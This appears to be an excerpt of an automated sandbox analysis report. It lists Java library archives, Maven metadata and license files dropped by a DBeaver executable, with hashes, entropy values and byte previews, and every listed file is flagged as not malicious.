      Preview:PK.........I.R................META-INF/..PK.........I.R................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3......PK.........I.R................org/..PK.........I.R................org/ejml/..PK.........I.R................org/ejml/generic/..PK.........I.RT.......y...+...org/ejml/generic/GenericMatrixOps_F64.class.V.oTE.....l?(.....bw.../....]......h.v{..v.[v......}3.(....K5Q...D_|1&.D_./...f..-.5j.9sf..;.wn......E&..4.z..L..%{.N..b>93...<..[t.1.-...E..X.G....h..O:K+........+.w..y.Z].-.(.ii..A.4..'K..T...y.j.#6=.O......"hG.@.NT|.....t....tq0.C."].t..g.8...G"8.c5dU.-$g..Bi.....^.T./8*.......N.)...E....Vn^H.......3n.!.y.<g+O..R..d.+..R.n...7........]p..5..<7.wQ......( ..K.....-...O...T.h....+.j.!.V.....#pp.......~..(.........:eF&!.J.|}.?.#...bYV=....O@_.y...Qc`Wt.....k..y.-..f..e.J6<s...V..s..W&..y...V8.........%.\.W#.%.&..z.K`+.8G...#.u..........V.[....|...6.-.O`h.ZJ....u..RF...?....Z4...W8p.l7c.~,......?..9..o.AM..@.s/..f.w......Rz..nr.P...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):23931
      Entropy (8bit):7.820586216803312
      Encrypted:false
      SSDEEP:
      MD5:5CC2C478D73E8454B4C369CEE66C5BC7
      SHA1:C9AD4A0850AB676C5C64461A05CA524CDFFF59F1
      SHA-256:4E69696892B88B41C55D49AB2FDCC21EEAD92BF54ACC588C0050596C3B75199C
      SHA-512:F8798BFBCC8AB8001BAF90CE47EC2264234DC1DA2D4AA97FDCDC0990472A6B5A5A32F828E776140777D598A99D8A0C0F51C6D0767AE1A829690AB9200AE35742
      Malicious:false
      Reputation:unknown
      Preview:PK.........t@................META-INF/MANIFEST.MF....uR.n.0..G.?X9...4..P.E."Q.Z..$.$vd.....(B..o3o.7..^.6....Rd(&.....+.M../90[N.$I.Q.2zN-..k..l...H..<....K.J*..gRT]U...+.B...&S.y....H....s.J..r...8+^....1m......; RUa..:\......'$".l.~~M7.K..6V.s#n....4..J;D!.RIY.PH..GK...7........./b.O.rz....m.C..-.T.oh......z..@..M..2i......N..s.......n....>.!2..?&.Q..~.PK..."..=... ...PK.........t@................META-INF/..PK..............PK.........t@................META-INF/maven/..PK..............PK.........t@............*...META-INF/maven/com.googlecode.json-simple/..PK..............PK.........t@............6...META-INF/maven/com.googlecode.json-simple/json-simple/..PK..............PK.........t@............D...META-INF/maven/com.googlecode.json-simple/json-simple/pom.propertiesU.... ..w...2W..B..:.....0.b-.'O-....t..WH@....W yi..O....kK.B....4.wCB..:Mz...<..Js..*..d.3O.....w..}....`:.......a3.....PK....n........PK.........t@............=...META-INF/maven/com.googleco
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Java archive data (JAR)
      Category:dropped
      Size (bytes):1103721
      Entropy (8bit):7.895176929601675
      Encrypted:false
      SSDEEP:
      MD5:A3B90D76C097FD275FBBF22F8E3CDE6B
      SHA1:3FF3BAA0074445384F9E0068DF81FBD0A168395A
      SHA-256:DBB8644CF324123D06C27AA982F570811E10B4CB1F2AEF893B00DE237D33EFC0
      SHA-512:7D7D0DD08ED1B0D21DCDFFA277EB2DC264B88FB950CA2DBE420729CE49C0106BB3AA27E26D943DBB8CAA43B9BA61C41464DD7C5EFD73B547FC85493EF3EA6443
      Malicious:false
      Reputation:unknown
      Preview:PK........N..T................META-INF/MANIFEST.MF.....ZKo.8......rX4@-.N.m\..G.-."..{.%Zf#.*E......dY.R.........3#..mh*g.R.2....{1.|.$..d...YHg.HDW....r.^.XRo....t.1.gw$...m.......W...n...aA.B....F......x*g..+.g@DL..g...>...,.9..-u.>=:O<.!...c.$uX.......p.,?;!.).N@.t.DT.....3.Kq..l..C..$.1..)...2IW.y..6[....uM..|...<.M...}.t...$...}..-]...G...@..w...T..K.T.YV..w....V.......{...9~q...$(X..=.!!.....h.....0.X<.......x.$.{.+....g..@......jQg.,.....R..v.c.N.%D.+.).|..Rd.,.....Zx.9J.Y*I....:....fah...eG....j...........v.M...B.-...N....m..!..V.....;.H........hL.8#....xxN..W.....aQb...~.q!.'.@...s.u=o...n.8..}..g..P.p.e"\.....yc.-.....'TIuY........1.....a...am..FEP.9U....5.......Y....m.........6.J6*`<.f..y...v.gbGB{..|..*D<...1..._..+#zd.1.%.....\(G.[.<_c...4...p,.5....j.....p.D>%.O.#{w..nBD...y.W.d_..y#....0..z..QO...c=..JI.?n.....u.V....Gc..E...bsF.y5O..|.4&..{P......*84J:{..G.Dg.A.EJ.%........$..z..7.....6.*.F4...6........s:..9...?..1-....]a...\
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v1.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):38657
      Entropy (8bit):7.886015722831581
      Encrypted:false
      SSDEEP:
      MD5:033B75F91EEFF0D25361ED6BFD1103CD
      SHA1:4C7018119AEB66335746E6748456C821E304D3A2
      SHA-256:E0F0C62024D4282F5F905DE1ABD2CC96F975A51D9E8D98254234FA14B16BBE9B
      SHA-512:80DB3AD457449BE82EFD28E3CC6520FDEFA3C94CCC35003F69E60FEA53CA72025318B01417A4EA193E8CC6E2352878453435872747C86A3B29536CF88AF72C24
      Malicious:false
      Reputation:unknown
      Preview:PK......../..T|.c............META-INF/MANIFEST.MF..A..0.E...!.H....].N.........I'.......>o..n...`^.%.v...+L.ppz _"..,h...Dr........$E_Bd...G....8d.F.....j.'&.........5[S]...B.?.3BDo....PK..|.c........PK......../..T................META-INF/PK...........T................org/PK...........T................org/locationtech/PK...........T................org/locationtech/jts/PK...........T................org/locationtech/jts/io/PK...........T............ ...org/locationtech/jts/io/geojson/PK...........T................org/locationtech/jts/io/twkb/PK......../..T................META-INF/maven/PK......../..T............'...META-INF/maven/org.locationtech.jts.io/PK......../..T............5...META-INF/maven/org.locationtech.jts.io/jts-io-common/PK...........T.u.^g.......6...org/locationtech/jts/io/geojson/GeoJsonConstants.class...N.@...@...P...@[L)].KjL..#.D.2f.&2..L*.zU..}.>T.3....U........_.....m.t(...lU...i..>7,.i..!.9..~..8L.F[.,....I_....j.]..[......<'PSS.R|A@.D.GzYXZ...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v1.0 to extract, compression method=store
      Category:dropped
      Size (bytes):177711
      Entropy (8bit):7.931787719347613
      Encrypted:false
      SSDEEP:
      MD5:AA2765E31151D88D701926F92D0A6F9F
      SHA1:2C9BC464D7390C8C16A366EB90C97F6AD5F4CFA5
      SHA-256:5FA3C9BF7D983CB73D322A2D93A6F529F6F96960E0876F893D0B4EB54203C723
      SHA-512:11A49A087B47BF2CD6B709CACD0755DB3940BDF5B21FFD6C8239FD9BD4AA44C5DA46B62AFEE4200EA9CDEA875CB8002FFBFD4A5B5F49E6A425114339D32DCDE8
      Malicious:false
      Reputation:unknown
      Preview:PK........2[.N................META-INF/PK........1[.N#(.km...........META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r,J..,K-B...V..+.$x..J3sJt.*...S..Sy...R.KRS.B.........e.y..z.z...).^). ;,......y.x..PK........,[.N................META-INF/services/PK.........[.N................org/PK.........[.N................org/cugos/PK......../[.N................org/cugos/wkg/PK......../[.N................org/cugos/wkg/internal/PK........,[.N.r..3...m...&...META-INF/services/org.cugos.wkg.Reader./J.K.M./.+.N.sO......JMLI-...G..HL.NLO.....K"."..PK........,[.N....3...m...&...META-INF/services/org.cugos.wkg.Writer./J.K.M./.+.N.sO....../.,I-...G..HL.NLO.....K"."..PK.........[.N..#.............org/cugos/wkg/AbstractGeometryCollection.class...S.U..7.lH..TBk..,.I ..ML.ii..T"X..%..&Yf..2.%>.....R.3N..3|..pF...n~-.i.....~..{.N......\.W.D.A.W...+.E.!...F0...cE.\.....qC...rS...F.O.k..c..."U..e.M.S...7Z.e..L.h.Y..-.....L..s.R6O...0.@~./P4.j.........u..7.....5.Q.l1z..................VI.qf.h...f
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):26430
      Entropy (8bit):4.614587822751861
      Encrypted:false
      SSDEEP:
      MD5:7FBC338309AC38FEFCD64B04BB903E34
      SHA1:E60C2E780886F95DF9C9EE36992B8EDABEC00BCC
      SHA-256:A190DC9C8043755D90F8B0A75FA66B9E42D4AF4C980BF5DDC633F0124DB3CEE7
      SHA-512:D816E5F9BD13606A6B47CCD462DF3C8DD02C312CF8ED35EDD24B7C8D2AC9E34E6BAAD223DCC5BF540E9CDA4B0F06904E577EE3EA23ADACD749AE152050791C6A
      Malicious:false
      Reputation:unknown
      Preview:.. GNU LESSER GENERAL PUBLIC LICENSE... Version 2.1, February 1999.. Copyright (C) 1991, 1999 Free Software Foundation, Inc.. 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA. Everyone is permitted to copy and distribute verbatim copies. of this license document, but changing it is not allowed...[This is the first released version of the Lesser GPL. It also counts. as the successor of the GNU Library Public License, version 2, hence. the version number 2.1.]..... Preamble.. The licenses for most software are designed to take away your.freedom to share and change it. By contrast, the GNU General Public.Licenses are intended to guarantee your freedom to share and change.free software--to make sure the software is free for all its users... This license, the Lesser General Public License, applies to some.specially designated software packages--typically libraries--of the.Free Software Foundation and other authors who decide to use it. You.can use it too, but we su
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Unicode text, UTF-8 text
      Category:dropped
      Size (bytes):65986
      Entropy (8bit):4.966706053768115
      Encrypted:false
      SSDEEP:
      MD5:3E6ACDDCD06DC64D64BB721972A40DB5
      SHA1:ACEEE5CAF98F03FE3FFC73A1864B761C6E31429D
      SHA-256:E383B90619C9F6BC7541CF079F04BABD2A8236151C0FCDE744FAD3C516D4380B
      SHA-512:818CA832012221C0A73E9E3F16B96A34738446A17FF2EE7584C3080209CB1A8D8B422163D04B194D907CD92CB82E104B2407F62FF42F20FB7A4A949D6B160193
      Malicious:false
      Reputation:unknown
      Preview:JFreeChart.==========..Version 1.5.0, 5 November 2017...[![Maven Central](https://maven-badges.herokuapp.com/maven-central/org.jfree/jfreechart/badge.svg)](https://maven-badges.herokuapp.com/maven-central/org.jfree/jfreechart)..Overview.--------.JFreeChart is a comprehensive free chart library for the Java(tm) platform that .can be used on the client-side (JavaFX and Swing) or the server side (with.export to multiple formats including SVG, PNG and PDF)...![JFreeChart sample](http://jfree.org/jfreechart/images/coffee_prices.png)..The home page for the project is:..http://www.jfree.org/jfreechart..JFreeChart requires JDK 1.6.0 or later. If JavaFX support is required, you.need to also include the JFreeChart-FX extensions:..https://github.com/jfree/jfreechart-fx..The library is licensed under the terms of the GNU Lesser General Public .License (LGPL) version 2.1 or later....Using JFreeChart.----------------.To use JFreeChart in your projects, add the following dependency to your build too
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):11638
      Entropy (8bit):4.431827170028191
      Encrypted:false
      SSDEEP:
      MD5:14B2C87457EAB0F575B762A5F9101569
      SHA1:3302887523950842157F53EE738851BE96317C6E
      SHA-256:FC5837B36A5B94CA9D6833AFDC9F634832ACC21995DF0CACC8CB4313329BACAF
      SHA-512:2CCC2E6CF6DB9512A04EEE60408FCA191DCBB480EDF72A04364643501E79978518A79DFFAA6BD5B0D6C873165720B5EFFBCC1EEE50C8D8AE8F3F38C99ED02EEA
      Malicious:false
      Reputation:unknown
      Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):1243
      Entropy (8bit):4.86731769838249
      Encrypted:false
      SSDEEP:
      MD5:ACDBE35D54AC4EEF6F598F019EA86B68
      SHA1:3C71C5188DD3F99A8B9DFD126EC1D73E420965D9
      SHA-256:40172226A910306B0EBB075C34B2BE15C70DFBA9F89D69FED593F3E05B2BF61C
      SHA-512:B8EE375E2A48AEAF6620B526476C067A8CB2E2DA4B9B874FEA131B4A75585BA44C7DAB70FB99C0ED4F735C127AD37920E69E2A181468B935E29CCC90059F00D7
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Created-By: Maven Archiver 3.6.1..Build-Jdk-Spec: 17..Bundle-ManifestVersion: 2..Bundle-Name: JFreeChart bundle..Bundle-SymbolicName: org.jkiss.bundle.jfreechart;singleton:=true..Bundle-Version: 1.0.23..Bundle-ClassPath: lib/jcommon-1.0.23.jar,lib/jfreechart-1.0.19.jar,lib/j.. freechart-swt-1.0.jar,lib/swtgraphics2d-1.0.jar,...Bundle-Vendor: DBeaver Corp..Eclipse-BundleShape: dir..Import-Package: org.eclipse.swt,org.eclipse.swt.events,org.eclipse.swt.g.. raphics,org.eclipse.swt.layout,org.eclipse.swt.printing,org.eclipse.swt.. .widgets..Export-Package: org.jfree.chart,org.jfree.chart.annotations,org.jfree.ch.. art.axis,org.jfree.chart.block,org.jfree.chart.labels,org.jfree.chart.s.. wt,org.jfree.chart.swt.editor,org.jfree.chart.panel,org.jfree.chart.plo.. t,org.jfree.chart.renderer,org.jfree.chart.renderer.category,org.jfree... chart.renderer.xy,org.jfree.chart.title,org.jfree.chart.util,org.jfree... data,org.jfree.data.category,org.jfree.data.function,org.jfree.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):79
      Entropy (8bit):4.575156066215231
      Encrypted:false
      SSDEEP:
      MD5:7ADF2D8DB147C31AD9193E9FD2E0CCDE
      SHA1:0D13ADAB5064014B990A3235744D72831B888452
      SHA-256:B11A3F87D977A95E1934D7F9F46EB02A31C6B49570A2CF767BBBBB3D0508F6F9
      SHA-512:47DEC0187FEEECFD610B14885BECAC605966D411671561AFF2C41AA1DB9CBCCE2D2A9FA531C25888FE6EA25749FF82815F2B4CF8B154FF1DF8F463646ABA2E1B
      Malicious:false
      Reputation:unknown
      Preview:artifactId=org.jkiss.bundle.jfreechart.groupId=org.jkiss.bundle.version=1.0.23.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):751
      Entropy (8bit):5.03850136729866
      Encrypted:false
      SSDEEP:
      MD5:245C493E8800F549E84A95F793868513
      SHA1:DEA972D9993FC10A4CA80B1EEED7216C2C99EA68
      SHA-256:D6B4D7A3A109427E75A9A922EB6628ECF2B56046E729CEF98930E3B777B51181
      SHA-512:F91F088017CB353854A2CA3E8DA37786F40FB174686F7828E7FCDA10BB562DB1D6641F10FAFFD17650756E3B9DBEB3E01BD9E4BE5DA908BAFE6541B0F48397DB
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<project xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd" xmlns="http://maven.apache.org/POM/4.0.0". xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">. <modelVersion>4.0.0</modelVersion>. <groupId>org.jkiss.bundle</groupId>. <artifactId>org.jkiss.bundle.jfreechart</artifactId>. <version>1.0.23</version>. <properties>. <tycho-version>3.0.1</tycho-version>. <eclipse-p2-repo.url>https://download.eclipse.org/releases/2023-03/</eclipse-p2-repo.url>. </properties>. <repositories>. <repository>. <id>eclipse-p2-repo</id>. <url>${eclipse-p2-repo.url}</url>. <layout>p2</layout>. </repository>. </repositories>.</project>.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with no line terminators
      Category:dropped
      Size (bytes):19
      Entropy (8bit):3.8924071185928786
      Encrypted:false
      SSDEEP:
      MD5:D77C533E19787CC1076832200B3F9023
      SHA1:8F6EEB51CFD4E114FD32E44EA7AB850778179323
      SHA-256:FB35D516797F017D3E1D4FC2A1FC7EB1FBFFC684A54B0FDFDC85F46AFFE6CC34
      SHA-512:532A17009C93CB4A7B7713D7C42111318D6AEBC4339D9D04119778A1E7AB6330B00DAF229984F8637B2B5BFB75D7789F7DFF98C80317CA38B84FBB2028A4C5F0
      Malicious:false
      Reputation:unknown
      Preview:# bundle-jfreechart
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v1.0 to extract, compression method=store
      Category:dropped
      Size (bytes):330246
      Entropy (8bit):7.9253682428812215
      Encrypted:false
      SSDEEP:
      MD5:1B059ADC60FEF2DA40B7130F9A67F977
      SHA1:A316F336CA996E0C6BEC4E4FBD49BE8F5E1C3968
      SHA-256:1E670402809484C71EC74D55B40022A4C4939C7911BD39EE5A0CFB3AAF56397C
      SHA-512:F4574E35698F66AC02C868E49CA4D238EB103390F1B842DEE5AFE0ADFDAACA5D86F3E149449C3DBAF83B4965BE4829679C201393DF33764C489288637EFF0A44
      Malicious:false
      Reputation:unknown
      Preview:PK........|..D................META-INF/PK........{..D.c]ji...........META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r,J..,K-B...V..+.$x...R.KRSt.*......3R.|..R.x..J3sJ..).9I.E%...]..l...z.....\.\.PK........z..D................com/PK........z..D................com/keypoint/PK........x..D................org/PK........z..D................org/jfree/PK........z..D................org/jfree/base/PK........z..D................org/jfree/base/config/PK........z..D................org/jfree/base/log/PK........z..D................org/jfree/base/modules/PK........z..D................org/jfree/date/PK........z..D................org/jfree/io/PK........z..D................org/jfree/layout/PK........z..D................org/jfree/resources/PK........z..D................org/jfree/text/PK........z..D................org/jfree/threads/PK........z..D................org/jfree/ui/PK........z..D................org/jfree/ui/about/PK........z..D................org/jfree/ui/about/resources/PK........z..D.............
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v1.0 to extract, compression method=store
      Category:dropped
      Size (bytes):1565065
      Entropy (8bit):7.963488138074853
      Encrypted:false
      SSDEEP:
      MD5:4FF3762BD04A7239CFB98DE542134BEC
      SHA1:BA9EE7DBB2E4C57A6901C79F614ED2DEA9CC0E20
      SHA-256:153D077D6399776A45DE97C555AD026EB6201D4BD8AF86CFCE7B8B4CCFA66263
      SHA-512:4461B94A95FFF1DCCD45B504E2CEBD37E294257AC743AF4296A55B1513D9133AEE0F69D05FC737406EE2246C7E1F20536CF235B02053D5CA7AED58586841C2BD
      Malicious:false
      Reputation:unknown
      Preview:PK........'t.D................META-INF/PK........&t.D.c]ji...........META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r,J..,K-B...V..+.$x...R.KRSt.*......3R.|..R.x..J3sJ..).9I.E%...]..l...z.....\.\.PK.........t.D................org/PK.........t.D................org/jfree/PK........ t.D................org/jfree/chart/PK.........t.D................org/jfree/chart/annotations/PK........ t.D................org/jfree/chart/axis/PK.........t.D................org/jfree/chart/block/PK.........t.D................org/jfree/chart/editor/PK........ t.D................org/jfree/chart/encoders/PK.........t.D................org/jfree/chart/entity/PK.........t.D................org/jfree/chart/event/PK.........t.D................org/jfree/chart/imagemap/PK........ t.D................org/jfree/chart/labels/PK.........t.D................org/jfree/chart/needle/PK.........t.D................org/jfree/chart/panel/PK........ t.D................org/jfree/chart/plot/PK........ t.D................org/jfree/chart/pl
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v1.0 to extract, compression method=store
      Category:dropped
      Size (bytes):55481
      Entropy (8bit):7.917319305335771
      Encrypted:false
      SSDEEP:
      MD5:93A2B934492FA3B0467377E6BBB8B5EE
      SHA1:8CF7320B8ED49CC24C22CA7E8206FA33C15C736A
      SHA-256:5D1E25BFAD05AB1ECBD8930E5A0AA05FF27DB46F3B081A327A3A64C4B308FFF3
      SHA-512:92EA2CF7ABBBF35A185314AE79E2B5AE81B2E1F0D4665FB977853746203EB3E744A9DEA106FEBD424D49CEEDAEA98B545DD6ECF743B3AE9AA416ACA588C97B48
      Malicious:false
      Reputation:unknown
      Preview:PK........e3TH................META-INF/PK........d3TH.tzJo...........META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r,J..,K-B...V..+.$x..J3sJt.*..R.3s.R.Jx...R.KRS...........e.y..zFzF.=).^). k,....v.r..PK........d3TH................org/PK........d3TH................org/jfree/PK........d3TH................org/jfree/chart/PK........e3TH................org/jfree/chart/swt/PK........e3TH................org/jfree/chart/swt/editor/PK........e3TH..,.i.......*...org/jfree/chart/swt/ChartComposite$1.class.S]O.A.=..nY.....@.RJ.X..../...V.0<.6....v..L.w.(...O>.....H..N..;.g.=s...??.....#.a......E1...%,:(..b.A.......nKU\g(..$...!.......WMT...XI-...LFRo3,..9.t....-.0^..x..6E.7;.)..w.x"..,.1...Z.....J...(V. }c'....\*J..Cy.S...S...."..?......Ph.......a.{m.(...i.............~.O..+.}'.^b..sj.N.t(.....q....Q.y...D..ul..V.'..f..P$..Tu.....3.\-....d.0.e..i~.G...<..&[.nV]*-.F....`.l..M.OT..$...rm..zm.q4]6O...P4..4.........."..1s.5.Y*..{.....*..N.tZ...G.........s..S....e.)......`..H...<
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v1.0 to extract, compression method=store
      Category:dropped
      Size (bytes):18236
      Entropy (8bit):7.920051813774207
      Encrypted:false
      SSDEEP:
      MD5:B85C25AD9486EB360F7F1F2A98FD3363
      SHA1:7DFB0B3BC496546A97D03BA3C4B9F5465BF2DB4A
      SHA-256:EC6374706695655904BF36AED360B4D4FF7DCDF5F29C598C4E3F90311826CC25
      SHA-512:74B45DE99C00803CCAD151935F295BA5A8451352EB8CADC45FE05CAAF298B5F66BC23500614BB4D6E8668C75A08B1430095052E1E7A7E38F44AD188120282A45
      Malicious:false
      Reputation:unknown
      Preview:PK..........TH................META-INF/PK..........TH.tzJo...........META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r,J..,K-B...V..+.$x..J3sJt.*..R.3s.R.Jx...R.KRS...........e.y..zFzF.=).^). k,....v.r..PK..........TH................org/PK..........TH................org/jfree/PK..........TH................org/jfree/swt/PK..........TH...p*..Tc..!...org/jfree/swt/SWTGraphics2D.class.|.|T......7o2...C....&...( K.."{.mH&.`..3.K.R..(...U....E.V[..ui......]l....}w...I...s.}....{....<~..&..<.w>..s=...,...G.|j..|...kx.55._../?.......9|)=,3x......>.Ds.S.....2.j7_.!|....u....l.Sh...?..#..........I8.@3..I..E..z.4.B8.....gx......@oZ.i....P..(...Q...p'...z.L.[.q+=n3.....4|&..r...9........y..a........\.."._.......f. ./..N._F..{`..E.+....x.........j...........C....)7....fZ{.5...m...;..........{...5.Rs...G...<@..y../...i.#4.h.>>..q.m...?@t............$5...)Zp....P.'......9^.S..5.S.3..9.^0....._.....ej^..W.k..$..........2..<.......y........................?R.'j>......
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):11357
      Entropy (8bit):4.4265944416265475
      Encrypted:false
      SSDEEP:
      MD5:86D3F3A95C324C9479BD8986968F4327
      SHA1:7DF059597099BB7DCF25D2A9AEDFAF4465F72D8D
      SHA-256:C71D239DF91726FC519C6EB72D318EC65820627232B2F796219E87DCF35D0AB4
      SHA-512:DC6B68D13B8CF959644B935F1192B02C71AA7A5CF653BD43B4480FA89EEC8D4D3F16A2278EC8C3B40AB1FDB233B3173A78FD83590D6F739E0C9E8FF56C282557
      Malicious:false
      Reputation:unknown
      Preview: Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial owne
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):627
      Entropy (8bit):5.153964695237144
      Encrypted:false
      SSDEEP:
      MD5:084B5FFCBEFED9D4DB17DA10A84443DC
      SHA1:70187712DA0BDE0AA9C8713BEEA4D72874A46BA8
      SHA-256:A2284DD2EE71A916DA9A11F67165B0AA3631E8F7F74CEED6121B557E5E4CA450
      SHA-512:867ACEFC8979FC0AB7C360AFC64B7F85A60AF1E975075C5F52410C0887690A93650FA69485E2854103C99027AAE013D4850F718C88405F09A315E0F50AA549B2
      Malicious:false
      Reputation:unknown
      Preview:Manifest-Version: 1.0..Created-By: Maven Archiver 3.6.1..Build-Jdk-Spec: 17..Bundle-ManifestVersion: 2..Bundle-Name: JSVG Bundle..Bundle-SymbolicName: org.jkiss.bundle.jsvg;singleton:=true..Bundle-Version: 1.3.1..Bundle-ClassPath: .,lib/jsvg-1.3.0.jar..Bundle-Vendor: Jannis Weis..Eclipse-BundleShape: dir..Export-Package: com.github.weisj.jsvg,com.github.weisj.jsvg.attributes,c.. om.github.weisj.jsvg.attributes.paint,com.github.weisj.jsvg.geometry.si.. ze,com.github.weisj.jsvg.nodes,com.github.weisj.jsvg.parser,com.github... weisj.jsvg.parser.css..Require-Capability: osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))"....
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):72
      Entropy (8bit):4.457421877190259
      Encrypted:false
      SSDEEP:
      MD5:22E3C2262CE2668417A060F447EBD216
      SHA1:9E6BDF74C88C74E3D355C6ED649B181DF8E9E51D
      SHA-256:928F71D4F7BCEDB61467CBADD55EA419CDC130048FD213F67BBB209C927AC828
      SHA-512:5CA77EAE7E19F194FC7F4C1EBDA20419EB09BD5FDE46915CD28C83B647A59565A6D13E7D42154BDBEF2ABC0B0EA196B13ED0C6330C4EB812150844ACD3725174
      Malicious:false
      Reputation:unknown
      Preview:artifactId=org.jkiss.bundle.jsvg.groupId=org.jkiss.bundle.version=1.3.1.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:XML 1.0 document, ASCII text
      Category:dropped
      Size (bytes):743
      Entropy (8bit):5.051052746833634
      Encrypted:false
      SSDEEP:
      MD5:6574012EB585C01136BE5F9D98586D11
      SHA1:76B3086DCF7ED21797A5AA7C461A67AD5F7A5121
      SHA-256:1C54FBCE3A476802532F3445E7FD5DC283266EEDD25FD481B89850AF5743AFB2
      SHA-512:91238F16D42D4F9E780F6767765EBF46F7A69DA4C3516E32432C1D7CCD42966AC95E87C92A9BF08B3C1EEE88D9C06B5A40D2D41BC9DD587CF26F2E27E0436B7B
      Malicious:false
      Reputation:unknown
      Preview:<?xml version="1.0" encoding="UTF-8"?>.<project xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd" xmlns="http://maven.apache.org/POM/4.0.0". xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">. <modelVersion>4.0.0</modelVersion>. <groupId>org.jkiss.bundle</groupId>. <artifactId>org.jkiss.bundle.jsvg</artifactId>. <version>1.3.1</version>. <properties>. <tycho-version>3.0.1</tycho-version>. <eclipse-p2-repo-url>https://download.eclipse.org/releases/2023-09</eclipse-p2-repo-url>. </properties>. <repositories>. <repository>. <id>eclipse-p2-repo</id>. <url>${eclipse-p2-repo-url}</url>. <layout>p2</layout>. </repository>. </repositories>.</project>.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):22
      Entropy (8bit):3.970573095811684
      Encrypted:false
      SSDEEP:
      MD5:C25DB027A42AB478E2729C1C568D2629
      SHA1:F8FEE15D1D81DAA5DC88F883B1940D8D6133D0C0
      SHA-256:6DE0A196278F7FE2A13687114E5DF14F2B3936C55DBBCA176198208B4FC49CBD
      SHA-512:40BED32C8C3B9A659A132E97A6EC56E91DA1BFE3D60C78829997FFE3A204144D45711E3055E3A5FDC7EF0BC08226F09DE6BE140291F26B0FDF508FC8E304DA9D
      Malicious:false
      Reputation:unknown
      Preview:# eclipse-bundle-jsvg.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):511129
      Entropy (8bit):7.889750404554155
      Encrypted:false
      SSDEEP:
      MD5:BE6CA7686F4CA1320FEC8B22762805A3
      SHA1:CFF25678C920DBD657BCE96E9245E4FB54F852E6
      SHA-256:A215CF2A11DCA182DA9BC578CA6AB7C3E1728282DF3A56F39EC8302F2C7895EF
      SHA-512:8C76C1725A5411B437E9EB98531C6957F8664D1B88700A4F04250D6BFCFF93FDE0DAC9157BD7ABBBC1F67FA68B56B4CA39391E134B0DFEBAC795D01D7CE941EB
      Malicious:false
      Reputation:unknown
